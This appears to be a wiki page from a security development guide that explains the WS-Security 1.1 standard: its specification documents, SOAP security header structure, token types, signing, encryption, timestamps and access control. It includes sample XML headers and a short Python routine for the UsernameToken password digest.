The WSS standard actually consists of a number of documents: one core document, which defines how security headers may be included in a SOAP envelope and describes all the high-level blocks that must be present in a valid security header, plus profile documents, which have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, and defining relationships left out of the core specification, such as the use of attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WS-Security with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e., everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message acts as a sort of envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well: the letter (SOAP message) should not know, nor should it care, about its envelope (WSS Header), since the different units of information carried on the envelope and in the letter are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions and signature verifications, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any elements to be present – so a minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, the header must carry some information that is going to help secure the message. This means including one or more security tokens with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password – the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
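&lt;br /&gt;
The formula translates directly into Python. Note the assumptions in this sketch: the nonce is the raw octets (i.e., already decoded from the Base64 form in which it travels), while created and password are UTF-8 encoded before hashing; the example nonce and timestamp are illustrative values:&lt;br /&gt;
&lt;br /&gt;
```python
import base64
import hashlib

def password_digest(nonce: bytes, created: str, password: str) -> str:
    """Password_Digest = Base64(SHA-1(nonce + created + password))."""
    sha = hashlib.sha1(nonce + created.encode("utf-8") + password.encode("utf-8"))
    return base64.b64encode(sha.digest()).decode("ascii")

# Illustrative nonce and timestamp; a real nonce should be random and unique.
digest = password_digest(b"\x8f\x1c\x22\x47", "2005-01-27T16:46:10Z", "secret")
```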
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
Binary tokens are used to convey binary data, such as X.509 certificates, in a text-encoded format – Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle the attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based token, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although it is technically not a security token, a Timestamp element may be inserted into a security header to ensure a message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts the use of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs be unique within the scope of the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have a closed schema), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
The WSS core specification also defines a general mechanism for referencing security tokens via the SecurityTokenReference element. An example of such an element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;&lt;br /&gt;
             1106844369755&lt;br /&gt;
           &amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
 	&amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of the specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
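&lt;br /&gt;
To illustrate the structure involved, a minimal detached signature over a SOAP Body carrying a wsu:Id might look as follows (the reference URI and the elided values are illustrative, not taken from any particular message; the algorithm URIs are the standard XML Signature identifiers):&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;ds:Signature xmlns:ds=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;ds:SignedInfo&amp;gt;&lt;br /&gt;
 	    &amp;lt;ds:CanonicalizationMethod Algorithm=&amp;quot;http://www.w3.org/2001/10/xml-exc-c14n#&amp;quot;/&amp;gt;&lt;br /&gt;
 	    &amp;lt;ds:SignatureMethod Algorithm=&amp;quot;http://www.w3.org/2000/09/xmldsig#rsa-sha1&amp;quot;/&amp;gt;&lt;br /&gt;
 	    &amp;lt;ds:Reference URI=&amp;quot;#myBody&amp;quot;&amp;gt;...&amp;lt;/ds:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/ds:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;ds:SignatureValue&amp;gt;...&amp;lt;/ds:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;ds:KeyInfo&amp;gt;&amp;lt;wsse:SecurityTokenReference&amp;gt;...&amp;lt;/wsse:SecurityTokenReference&amp;gt;&amp;lt;/ds:KeyInfo&amp;gt;&lt;br /&gt;
 	&amp;lt;/ds:Signature&amp;gt;&lt;br /&gt;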
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be prepended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message using overlapping signature and encryption blocks, as in this case there is nothing that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. As with XML-dsig, this standard operates on selected elements of the SOAP message, but it replaces the encrypted element’s data with an &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and prepended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
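&lt;br /&gt;
As a sketch of this layout, the key-wrapping element in the security header and the corresponding encrypted Body content might look as follows (the algorithm choices and the elided values are illustrative; the algorithm URIs are the standard XML Encryption identifiers):&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;xenc:CipherData&amp;gt;&amp;lt;xenc:CipherValue&amp;gt;...&amp;lt;/xenc:CipherValue&amp;gt;&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
 	  &amp;lt;xenc:ReferenceList&amp;gt;&amp;lt;xenc:DataReference URI=&amp;quot;#bodyData&amp;quot;/&amp;gt;&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
 	&amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
&lt;br /&gt;
with the SOAP Body then containing only:&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;xenc:EncryptedData Id=&amp;quot;bodyData&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#aes128-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;xenc:CipherData&amp;gt;&amp;lt;xenc:CipherValue&amp;gt;...&amp;lt;/xenc:CipherValue&amp;gt;&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;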
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP message freshness is addressed via a timestamp mechanism – each security header may contain just one such element, which states, in UTC format, the creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
       &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern-day systems) – this has to be addressed out-of-band as far as the WSS mechanics are concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, which is expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with a proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks them against the backend user store, or extracts the subject name from the X.509 certificate used for signing the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define the Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Service communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply the appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them, WS-SecurityPolicy, for security.&lt;br /&gt;
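&lt;br /&gt;
As a rough illustration, a WS-SecurityPolicy assertion requiring that the SOAP Body be signed looks along these lines (the exact element names and nesting vary between draft versions of the specification, so treat this as a sketch only):&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;sp:SignedParts&amp;gt;&lt;br /&gt;
 	  &amp;lt;sp:Body/&amp;gt;&lt;br /&gt;
 	&amp;lt;/sp:SignedParts&amp;gt;&lt;br /&gt;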
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via the trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden along the way, and one of the major ones is security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
